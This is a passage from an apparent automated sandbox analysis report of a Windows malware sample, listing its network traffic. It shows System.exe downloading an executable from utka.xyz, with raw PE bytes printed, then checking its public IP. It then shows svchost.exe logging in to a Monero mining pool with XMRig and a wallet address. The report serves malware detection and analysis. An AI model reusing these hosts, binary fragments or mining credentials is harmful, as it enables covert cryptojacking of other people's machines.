                                                    Sep 17, 2024 04:00:10.221771955 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.221884966 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.221909046 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.221999884 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222022057 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222146034 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222167969 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222186089 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222203970 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222223043 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222240925 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222259045 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222371101 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222551107 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222573042 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222589970 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222606897 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222675085 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222789049 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.222915888 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.228137970 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.256432056 CEST90034976289.23.100.233192.168.11.20
                                                    Sep 17, 2024 04:00:10.284197092 CEST497629003192.168.11.2089.23.100.233
                                                    Sep 17, 2024 04:00:10.284197092 CEST4976180192.168.11.20104.16.185.241
                                                    Sep 17, 2024 04:00:16.238540888 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 04:00:16.280313015 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 04:00:16.393522024 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 04:00:16.445038080 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 04:00:18.386598110 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 04:00:18.429027081 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 04:00:23.634105921 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 04:00:23.634177923 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 04:00:23.788923979 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 04:00:23.834136963 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 04:00:40.389518023 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 04:00:40.439881086 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 04:01:02.381880045 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 04:01:02.435092926 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 04:01:24.399553061 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 04:01:24.445868969 CEST49760443192.168.11.20142.202.242.43
                                                    Sep 17, 2024 04:01:46.404943943 CEST44349760142.202.242.43192.168.11.20
                                                    Sep 17, 2024 04:01:46.456641912 CEST49760443192.168.11.20142.202.242.43

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 17, 2024 03:59:45.890938044 CEST5651553192.168.11.201.1.1.1
                                                    Sep 17, 2024 03:59:46.021297932 CEST53565151.1.1.1192.168.11.20
                                                    Sep 17, 2024 03:59:57.809842110 CEST4998953192.168.11.201.1.1.1
                                                    Sep 17, 2024 03:59:57.925354004 CEST53499891.1.1.1192.168.11.20
                                                    Sep 17, 2024 03:59:58.482445955 CEST6240653192.168.11.201.1.1.1
                                                    Sep 17, 2024 03:59:58.577085018 CEST53624061.1.1.1192.168.11.20
                                                    Sep 17, 2024 03:59:58.781620026 CEST5919053192.168.11.201.1.1.1
                                                    Sep 17, 2024 03:59:58.878467083 CEST53591901.1.1.1192.168.11.20

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Sep 17, 2024 03:59:45.890938044 CEST192.168.11.201.1.1.10xd2b3Standard query (0)utka.xyzA (IP address)IN (0x0001)false
                                                    Sep 17, 2024 03:59:57.809842110 CEST192.168.11.201.1.1.10xa1e8Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                    Sep 17, 2024 03:59:58.482445955 CEST192.168.11.201.1.1.10x52ceStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                    Sep 17, 2024 03:59:58.781620026 CEST192.168.11.201.1.1.10x893dStandard query (0)43.97.8.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Sep 17, 2024 03:59:46.021297932 CEST1.1.1.1192.168.11.200xd2b3No error (0)utka.xyz191.101.104.168A (IP address)IN (0x0001)false
                                                    Sep 17, 2024 03:59:57.925354004 CEST1.1.1.1192.168.11.200xa1e8No error (0)pool.hashvault.pro142.202.242.45A (IP address)IN (0x0001)false
                                                    Sep 17, 2024 03:59:57.925354004 CEST1.1.1.1192.168.11.200xa1e8No error (0)pool.hashvault.pro142.202.242.43A (IP address)IN (0x0001)false
                                                    Sep 17, 2024 03:59:58.577085018 CEST1.1.1.1192.168.11.200x52ceNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                    Sep 17, 2024 03:59:58.577085018 CEST1.1.1.1192.168.11.200x52ceNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                    Sep 17, 2024 03:59:58.878467083 CEST1.1.1.1192.168.11.200x893dName error (3)43.97.8.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • utka.xyz
                                                    • icanhazip.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.11.2049761104.16.185.241806804C:\Users\user\Desktop\System.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 17, 2024 03:59:58.672451973 CEST63OUTGET / HTTP/1.1
                                                    Host: icanhazip.com
                                                    Connection: Keep-Alive
                                                    Sep 17, 2024 03:59:58.777120113 CEST537INHTTP/1.1 200 OK
                                                    Date: Tue, 17 Sep 2024 01:59:58 GMT
                                                    Content-Type: text/plain
                                                    Content-Length: 15
                                                    Connection: keep-alive
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET
                                                    Set-Cookie: __cf_bm=M0KtenHCd.EY19Q_17ixbxlffLNjaJsXoXNFhyomflQ-1726538398-1.0.1.1-fIuZx8CHq_rlcwUzu8gUH4IsuL8iCgS.phC0A_fffWRtrRnLuF0mXKhfDnq5WXXCLu4VJwHxGpGDZhkmpLH7qA; path=/; expires=Tue, 17-Sep-24 02:29:58 GMT; domain=.icanhazip.com; HttpOnly
                                                    Server: cloudflare
                                                    CF-RAY: 8c45800009717295-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 31 39 31 2e 39 36 2e 32 32 37 2e 32 32 32 0a
                                                    Data Ascii: 191.96.227.222


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.11.2049759191.101.104.1684436804C:\Users\user\Desktop\System.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-17 01:59:46 UTC66OUTGET /1234.exe HTTP/1.1
                                                    Host: utka.xyz
                                                    Connection: Keep-Alive
                                                    2024-09-17 01:59:46 UTC533INHTTP/1.1 200 OK
                                                    Server: hcdn
                                                    Date: Tue, 17 Sep 2024 01:59:46 GMT
                                                    Content-Type: application/x-executable
                                                    Content-Length: 2660352
                                                    Connection: close
                                                    last-modified: Sun, 25 Aug 2024 21:46:32 GMT
                                                    etag: "289800-66cba638-1958d45fed57dc25;;;"
                                                    platform: hostinger
                                                    panel: hpanel
                                                    content-security-policy: upgrade-insecure-requests
                                                    x-turbo-charged-by: LiteSpeed
                                                    alt-svc: h3=":443"; ma=86400
                                                    x-hcdn-request-id: 97c1b1381aaa165fc09425d1e8f8645c-bos-edge3
                                                    x-hcdn-cache-status: MISS
                                                    x-hcdn-upstream-rt: 0.007
                                                    Accept-Ranges: bytes
                                                    2024-09-17 01:59:46 UTC836INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 08 00 f4 d8 43 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 90 00 00 00 04 28 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 29 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00
                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdCf"(@@)`
                                                    2024-09-17 01:59:46 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 48 83 ec 20 48 8b 05 1c 90 00 00 c7 00 01 00 00 00 48 8b 05 17 90 00 00 c7 00 01 00 00 00 48 8b 05 12 90 00 00 c7 00 01 00 00 00 48 8b 0d d5 8f 00 00 0f b7 11 31 c0 81 fa 4d 5a 00 00 75 4b 48 63 51
                                                    Data Ascii: VH HHHH1MZuKHcQ
                                                    2024-09-17 01:59:46 UTC1369INData Raw: bb 00 00 ae 08 3f 81 e8 eb fe ff ff c7 05 4d bb 00 00 c5 d8 af 24 e8 dc fe ff ff c7 05 3e bb 00 00 0e 26 2b 9b e8 cd fe ff ff c7 05 2f bb 00 00 8c c5 5f ae e8 be fe ff ff c7 05 20 bb 00 00 6e 4a ef a5 e8 af fe ff ff c7 05 11 bb 00 00 83 bf 02 54 e8 a0 fe ff ff c7 05 02 bb 00 00 c8 77 a7 85 e8 91 fe ff ff c7 05 f3 ba 00 00 7e d1 c5 05 e8 82 fe ff ff c7 05 e4 ba 00 00 92 90 37 c6 e8 73 fe ff ff c7 05 d5 ba 00 00 28 14 6e 1e e8 64 fe ff ff c7 05 c6 ba 00 00 05 c4 db b8 e8 55 fe ff ff c7 05 b7 ba 00 00 48 98 11 4f e8 46 fe ff ff c7 05 a8 ba 00 00 17 73 27 5e e8 37 fe ff ff c7 05 99 ba 00 00 da 9c 71 42 e8 28 fe ff ff c7 05 8a ba 00 00 2f ac 9d b3 e8 19 fe ff ff c7 05 7b ba 00 00 b7 bc e2 64 e8 0a fe ff ff c7 05 6c ba 00 00 db 53 87 97 e8 fb fd ff ff c7 05 5d
                                                    Data Ascii: ?M$>&+/_ nJTw~7s(ndUHOFs'^7qB(/{dlS]
                                                    2024-09-17 01:59:46 UTC1369INData Raw: 49 89 f1 41 ff d6 48 83 c4 20 48 8b 15 99 8a 28 00 8b 05 9b 8a 28 00 eb c1 48 8d 65 08 5b 5f 5e 41 5c 41 5d 41 5e 41 5f 5d c3 8b 53 08 83 fa 01 0f 85 5b 01 00 00 48 83 c3 0c 48 3b 1d 79 89 00 00 0f 83 61 ff ff ff 4c 8b 35 c4 85 00 00 4c 8d 3d bd 87 00 00 41 bc 8b 00 00 00 48 8d 75 f8 49 bd 00 00 00 00 ff ff ff ff eb 1c 66 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 48 83 c3 0c 48 39 fb 0f 83 21 ff ff ff 8b 4b 08 41 89 c8 41 81 e0 f8 00 00 00 41 83 c0 f8 41 0f ac c8 03 41 83 f8 07 0f 87 d7 00 00 00 8b 13 8b 43 04 4c 01 f0 4e 8b 0c 32 4f 63 14 87 4d 01 fa 41 ff e2 44 0f b6 18 4d 8d 93 00 ff ff ff 45 84 db eb 1b 44 0f b7 18 4d 8d 93 00 00 ff ff 66 45 85 db eb 0a 44 8b 18 4f 8d 14 2b 45 85 db 4d 0f 49 d3 eb 03 4c 8b 10 4c 01 f2 49 29 d2 4d 01 ca 4c 89 55 f8 0f
                                                    Data Ascii: IAH H((He[_^A\A]A^A_]S[HH;yaL5L=AHuIffffff.HH9!KAAAAACLN2OcMADMEDMfEDO+EMILLI)MLU
                                                    2024-09-17 01:59:46 UTC1369INData Raw: 04 00 00 00 eb 05 b9 0b 00 00 00 ff 15 a8 b0 28 00 89 f0 48 83 c4 20 5b 5f 5e c3 cc cc cc cc cc cc ff e0 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 c8 48 87 05 2e 85 28 00 c3 0f 1f 44 00 00 48 8b 05 21 85 28 00 c3 cc cc cc cc cc cc cc cc 48 8b 05 39 84 00 00 48 8b 00 c3 cc cc cc cc cc 48 8b 05 31 84 00 00 48 8b 00 c3 cc cc cc cc cc 41 56 56 57 53 48 83 ec 28 31 f6 83 3d ee 84 28 00 00 74 54 48 89 d7 89 cb b9 01 00 00 00 ba 18 00 00 00 e8 38 7f 00 00 48 85 c0 74 36 49 89 c6 89 18 48 89 78 08 48 8d 3d cb 84 28 00 48 89 f9 ff 15 72 9b 00 00 48 8b 05 e3 84 28 00 49 89 46 10 4c 89 35 d8 84 28 00 48 89 f9 ff 15 6f 9b 00 00 eb 05 be ff ff ff ff 89 f0 48 83 c4 28 5b 5f 5e 41 5e c3 66 66 66 2e 0f 1f 84 00 00 00
                                                    Data Ascii: (H [_^fffff.HH.(DH!(H9HH1HAVVWSH(1=(tTH8Ht6IHxH=(HrH(IFL5(HoH([_^A^fff.
                                                    2024-09-17 01:59:46 UTC1369INData Raw: 0f 1f 84 00 00 00 00 00 48 83 c0 28 ff ca 74 10 f6 40 27 20 74 f2 48 85 c9 74 07 48 ff c9 eb e8 31 c0 c3 0f 1f 44 00 00 48 8b 05 31 7b 00 00 0f b7 08 81 f9 4d 5a 00 00 75 1a 48 63 48 3c 81 3c 08 50 45 00 00 75 0d 0f b7 4c 08 18 81 f9 0b 02 00 00 74 02 31 c0 c3 90 48 8b 15 01 7b 00 00 44 0f b7 02 31 c0 41 81 f8 4d 5a 00 00 75 70 4c 63 42 3c 42 81 3c 02 50 45 00 00 75 62 4c 01 c2 44 0f b7 42 18 41 81 f8 0b 02 00 00 75 51 44 0f b7 42 06 4d 85 c0 74 47 48 2b 0d c2 7a 00 00 0f b7 42 14 48 01 d0 48 83 c0 18 49 c1 e0 03 4f 8d 04 80 31 d2 eb 0c 0f 1f 00 48 83 c2 28 41 39 d0 74 1e 44 8b 4c 10 0c 4c 39 c9 72 ed 44 03 4c 10 08 4c 39 c9 73 e3 8b 44 10 24 f7 d0 c1 e8 1f c3 31 c0 c3 66 0f 1f 44 00 00 56 48 8b 15 70 7a 00 00 0f b7 02 3d 4d 5a 00 00 0f 85 87 00 00 00 48
                                                    Data Ascii: H(t@' tHtH1DH1{MZuHcH<<PEuLt1H{D1AMZupLcB<B<PEubLDBAuQDBMtGH+zBHHIO1H(A9tDLL9rDLL9sD$1fDVHpz=MZH
                                                    2024-09-17 01:59:46 UTC1369INData Raw: a0 00 00 00 4c 8b a4 24 80 00 00 00 49 8b 4c 24 20 0f b7 49 50 0f b7 d0 48 89 94 24 a8 00 00 00 4a 8d 04 2e 4c 01 f8 48 01 d1 4c 8d 3c 08 49 81 c7 16 04 00 00 48 c7 44 24 60 00 00 00 00 4c 89 bc 24 90 00 00 00 c7 44 24 28 04 00 00 00 c7 44 24 20 00 30 00 00 48 8d 54 24 60 4c 8d 8c 24 90 00 00 00 48 c7 c1 ff ff ff ff 45 31 c0 e8 36 ea ff ff 4c 89 e1 4c 8b 64 24 60 45 89 3c 24 45 89 7c 24 04 48 8b 44 24 70 c1 e0 10 48 09 c7 48 09 f7 41 c7 44 24 08 01 00 00 00 49 c7 44 24 10 fd ff ff ff 49 89 7c 24 38 48 8b 44 24 78 49 89 44 24 40 48 8b 41 20 0f 10 40 50 41 0f 11 44 24 50 41 83 e6 fe 41 c1 e6 10 4c 8b bc 24 a0 00 00 00 4d 09 fe 4d 89 74 24 60 c1 e5 10 4c 09 ed 48 8d bc 24 30 01 00 00 49 89 7c 24 68 49 89 6c 24 70 48 8b 84 24 b8 00 00 00 49 89 44 24 78 48 8b
                                                    Data Ascii: L$IL$ IPH$J.LHL<IHD$`L$D$(D$ 0HT$`L$HE16LLd$`E<$E|$HD$pHHAD$ID$I|$8HD$xID$@HA @PAD$PAAL$MMt$`LH$0I|$hIl$pH$ID$xH
                                                    2024-09-17 01:59:46 UTC1369INData Raw: e5 ff ff 90 48 81 c4 60 00 01 00 5b 5d 5f 5e 41 5e c3 cc cc cc cc 41 56 56 57 55 53 48 83 ec 40 4c 89 c6 48 89 d7 48 89 cb e8 58 02 00 00 48 89 f8 48 c1 e8 02 48 8d 04 40 48 89 06 48 89 44 24 38 48 c7 44 24 30 00 00 00 00 c7 44 24 28 04 00 00 00 c7 44 24 20 00 10 00 00 48 8d 54 24 30 45 31 f6 4c 8d 4c 24 38 48 c7 c1 ff ff ff ff 45 31 c0 e8 d9 e4 ff ff 48 8b 6c 24 30 41 b9 3e 00 00 00 31 c9 eb 11 90 49 83 c6 04 48 89 d1 49 39 fe 0f 83 d1 01 00 00 42 0f b6 04 33 8d 50 a5 80 fa e6 73 33 8d 50 85 80 fa e6 73 3b 8d 50 c6 80 fa f6 73 38 ba 3f 00 00 00 83 f8 2f 74 02 31 d2 83 f8 2b 41 0f 44 d1 eb 30 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 83 c0 bf eb 1b 66 66 2e 0f 1f 84 00 00 00 00 00 83 c0 b9 eb 0b 83 c0 04 0f 1f 84 00 00 00 00 00 89 c2 42 0f b6 44 33 01 44
                                                    Data Ascii: H`[]_^A^AVVWUSH@LHHXHHH@HHD$8HD$0D$(D$ HT$0E1LL$8HE1Hl$0A>1IHI9B3Ps3Ps;Ps8?/t1+AD0fffff.ff.BD3D
                                                    2024-09-17 01:59:46 UTC1369INData Raw: 00 00 00 4c 89 f1 e8 d2 69 00 00 8d 0c 45 02 00 00 00 01 c0 66 89 4c 24 62 66 89 44 24 60 4c 89 74 24 68 0f 29 b4 24 80 00 00 00 0f 29 b4 24 90 00 00 00 c7 84 24 80 00 00 00 30 00 00 00 c7 84 24 98 00 00 00 40 00 00 00 48 89 bc 24 90 00 00 00 48 8d 84 24 a0 00 00 00 0f 11 30 c7 44 24 50 00 00 00 00 48 c7 44 24 48 00 00 00 00 c7 44 24 40 01 00 00 00 c7 44 24 38 03 00 00 00 c7 44 24 30 00 00 00 00 c7 44 24 28 80 00 00 00 48 c7 44 24 20 00 00 00 00 4c 89 e9 ba 16 01 12 00 49 89 e8 49 89 f1 e8 c6 de ff ff 85 c0 78 0a 48 8b 4c 24 78 e8 f4 de ff ff 42 0f b7 44 3b 02 66 85 c0 0f 85 9d fe ff ff eb 46 c6 05 b0 70 28 00 01 48 b8 49 00 2c 00 2c 00 49 00 48 89 05 95 70 28 00 66 c7 05 94 70 28 00 ed 00 48 8d 0d 5d 02 00 00 e8 c8 dd ff ff c6 05 76 6f 28 00 01 80 3d 7c
                                                    Data Ascii: LiEfL$bfD$`Lt$h)$)$$0$@H$H$0D$PHD$HD$@D$8D$0D$(HD$ LIIxHL$xBD;fFp(HI,,IHp(fp(H]vo(=|
                                                    2024-09-17 01:59:46 UTC1369INData Raw: 8b 44 3e 50 48 89 44 24 60 c7 44 24 28 04 00 00 00 c7 44 24 20 00 30 00 00 48 8d 54 24 38 4c 8d 4c 24 60 45 31 c0 e8 72 da ff ff 48 8b 4c 24 40 85 c0 0f 88 b9 01 00 00 48 8b 54 24 38 46 8b 4c 3e 54 48 c7 44 24 20 00 00 00 00 49 89 f0 e8 59 da ff ff 66 42 83 7c 3e 06 00 0f 84 eb 00 00 00 48 b8 df 6b 05 ab af 49 01 7d 4d 8d 2c 37 49 81 c5 10 01 00 00 31 ed 48 8d 78 02 48 8d 58 1e 4c 8d 60 3e eb 23 66 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 ff c5 42 0f b7 44 3e 06 49 83 c5 28 39 c5 0f 83 a3 00 00 00 41 8b 45 1c 85 c0 48 89 f9 48 ba df 6b 05 ab af 49 01 7d 48 0f 49 ca 4d 89 e6 4c 0f 49 f3 a9 00 00 00 20 4c 0f 44 f1 48 b8 23 94 fa 54 50 b6 fe 82 49 01 c6 48 8b 4c 24 40 41 8b 55 04 45 8b 4d 08 48 03 54 24 38 45 8b 45 0c 49 01 f0 48 c7 44 24 20 00 00 00 00 e8
                                                    Data Ascii: D>PHD$`D$(D$ 0HT$8LL$`E1rHL$@HT$8FL>THD$ IYfB|>HkI}M,7I1HxHXL`>#ffffff.BD>I(9AEHHkI}HIMLI LDH#TPIHL$@AUEMHT$8EEIHD$


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.11.2049760142.202.242.434436376C:\Windows\System32\svchost.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-17 01:59:58 UTC599OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 41 54 54 4b 6d 79 6e 76 42 63 35 32 51 57 76 6d 6b 51 58 4a 33 45 71 33 7a 47 72 75 50 4a 48 50 67 56 41 46 39 50 4c 77 50 7a 41 63 51 75 35 65 52 6d 4d 55 50 47 43 68 37 77 4e 4c 4c 71 78 64 6a 44 47 38 41 51 67 79 61 4a 71 71 61 6f 6d 64 4e 71 38 34 38 58 37 4c 50 41 74 54 48 54 22 2c 22 70 61 73 73 22 3a 22 4e 65 77 4e 61 68 75 79 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67
                                                    Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4ATTKmynvBc52QWvmkQXJ3Eq3zGruPJHPgVAF9PLwPzAcQu5eRmMUPGCh7wNLLqxdjDG8AQgyaJqqaomdNq848X7LPAtTHT","pass":"NewNahuy","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rig
                                                    2024-09-17 01:59:58 UTC732INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 62 62 33 38 62 39 62 35 2d 31 65 66 66 2d 34 38 39 65 2d 38 66 31 63 2d 61 39 66 32 36 38 61 35 38 64 65 39 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 63 63 35 61 33 62 37 30 36 35 35 33 35 38 61 62 38 31 63 37 66 36 38 31 37 65 63 38 64 62 37 39 64 37 31 62 61 34 30 63 64 62 30 66 62 34 64 33 32 61 65 62 62 64 34 32 31 31 30 34 38 30 37 32 64 62 62 32 35 64 64 36 30 30 30 30 30 30 30 30 30 36 32 66 63 37 37 31 37 65 62 32 61 61 30 34 30 36 38 39 66 36 30 33 36 64 36 66 37 30 36 32 61 65 32 36 39 38 31 64 30 32 66 66 32 32 34 39 33 62 32 35 32 35 37 61 34 63 33 62 64 65 38 38
                                                    Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"bb38b9b5-1eff-489e-8f1c-a9f268a58de9","job":{"blob":"10109cc5a3b70655358ab81c7f6817ec8db79d71ba40cdb0fb4d32aebbd4211048072dbb25dd600000000062fc7717eb2aa040689f6036d6f7062ae26981d02ff22493b25257a4c3bde88
                                                    2024-09-17 02:00:01 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 63 63 35 61 33 62 37 30 36 35 35 33 35 38 61 62 38 31 63 37 66 36 38 31 37 65 63 38 64 62 37 39 64 37 31 62 61 34 30 63 64 62 30 66 62 34 64 33 32 61 65 62 62 64 34 32 31 31 30 34 38 30 37 32 64 62 62 32 35 64 64 36 30 30 30 30 30 30 30 30 30 37 62 31 64 36 33 32 30 66 32 31 62 62 38 34 38 63 30 64 30 36 66 66 64 37 63 66 35 35 65 36 34 35 32 35 36 62 39 38 61 33 63 63 37 66 66 63 66 66 61 34 34 66 30 30 36 30 30 35 32 35 62 39 64 31 37 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 39 61 66 32 31 64 38 31 2d 63 62 36 64 2d 34 65 31 62 2d 61 66 63 61 2d 65 30 35 37 35 37 35 39 66 64 63 39 22 2c 22 74 61
                                                    Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109cc5a3b70655358ab81c7f6817ec8db79d71ba40cdb0fb4d32aebbd4211048072dbb25dd60000000007b1d6320f21bb848c0d06ffd7cf55e645256b98a3cc7ffcffa44f00600525b9d17","job_id":"9af21d81-cb6d-4e1b-afca-e0575759fdc9","ta
                                                    2024-09-17 02:00:16 UTC256OUTData Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 73 75 62 6d 69 74 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 62 62 33 38 62 39 62 35 2d 31 65 66 66 2d 34 38 39 65 2d 38 66 31 63 2d 61 39 66 32 36 38 61 35 38 64 65 39 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 39 61 66 32 31 64 38 31 2d 63 62 36 64 2d 34 65 31 62 2d 61 66 63 61 2d 65 30 35 37 35 37 35 39 66 64 63 39 22 2c 22 6e 6f 6e 63 65 22 3a 22 38 62 31 63 30 31 30 30 22 2c 22 72 65 73 75 6c 74 22 3a 22 62 31 31 30 61 34 36 34 63 62 64 61 31 61 62 62 30 36 64 64 38 36 63 62 37 62 66 38 38 37 38 36 37 33 35 30 34 36 62 39 65 32 30 39 64 39 61 63 38 62 38 37 36 34 38 66 62 65 35 30 30 30 30 30 22 2c 22 61 6c 67 6f 22 3a 22 72 78 2f 30 22 7d 7d 0d
                                                    Data Ascii: {"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"bb38b9b5-1eff-489e-8f1c-a9f268a58de9","job_id":"9af21d81-cb6d-4e1b-afca-e0575759fdc9","nonce":"8b1c0100","result":"b110a464cbda1abb06dd86cb7bf88786735046b9e209d9ac8b87648fbe500000","algo":"rx/0"}}
                                                    2024-09-17 02:00:16 UTC63INData Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4f 4b 22 7d 7d 0a
                                                    Data Ascii: {"id":2,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}
